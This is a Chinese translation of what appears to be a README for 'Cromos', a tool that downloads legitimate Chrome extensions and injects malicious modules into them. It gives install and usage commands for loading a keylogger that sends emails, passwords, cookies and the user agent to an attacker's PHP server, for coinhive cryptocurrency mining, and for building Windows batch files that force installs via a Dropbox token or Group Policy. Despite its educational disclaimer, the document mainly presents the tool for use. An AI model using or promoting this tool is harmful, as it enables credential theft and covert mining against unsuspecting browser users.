【译】Cromos – 下载并注入代码到谷歌 Chrome 浏览器扩展中

cromos是一个用于下载Chrome网页商店合法扩展的工具，还可以在应用程序背景下注入代码。并且举例而言，cromos通过PowerShell创建可执行文件强制安装，并到云端更新文件来主持恶意文件。

• 下载扩展
• 注入
• 更新云端上的文件
• Windows感染

安装

$ cd $HOME/
$ git clone https://github.com/fbctf/cromos
$ sudo chmod -R 777 cromos/
$ cd cromos && python setup.py

使用说明

下载扩展

Usage: python cromos.py --extension {id}

下载扩展并载入模块

Usage: python cromos.py --extension {id} --load {currency/keylogger}

创建批处理文件并更新云端文件

Usage: python cromos.py --extension {id} --build {bat} --token {dropboxToken}

模块

你也可以在后台注入一些预定义模块，例如键盘侧录（keylogger）, 虚拟货币（virtual currency）。

模块

描述

模块/键盘侧录（keylogger）

在一个受感染的浏览器中，这个模块将捕获你输入的所有密码，不管是否基于 https 协议，你所需要的只是一个php服务器，用于接收请求的参数，即电子邮件地址,密码,浏览器缓存（cookies）和用户代理程式识别码（userAgent）。

模块/货币（currency）

这个模块允许使用coinhive API挖掘虚拟金币,你只需要一个帐户。

组策略对象（GPO）

Chrome允许你添加扩展使用Windows组策略对象(GPO)。如果你需要在多台机器上强制安装，只需要按照Chrome部署向导中的步骤，然后稍微修改原来的扩展，你就可以在Chrome网页商店发布你的扩展，这需要支付5美元。

免责声明

代码示例是基于教育目的提供的。只有调查研究恶意行为者的攻击技术，我们才能构建足够的防御。未经许可,对目标系统使用这段代码在大多数地区是非法的。对滥用这段信息和代码造成的损失，作者不承担任何赔偿责任。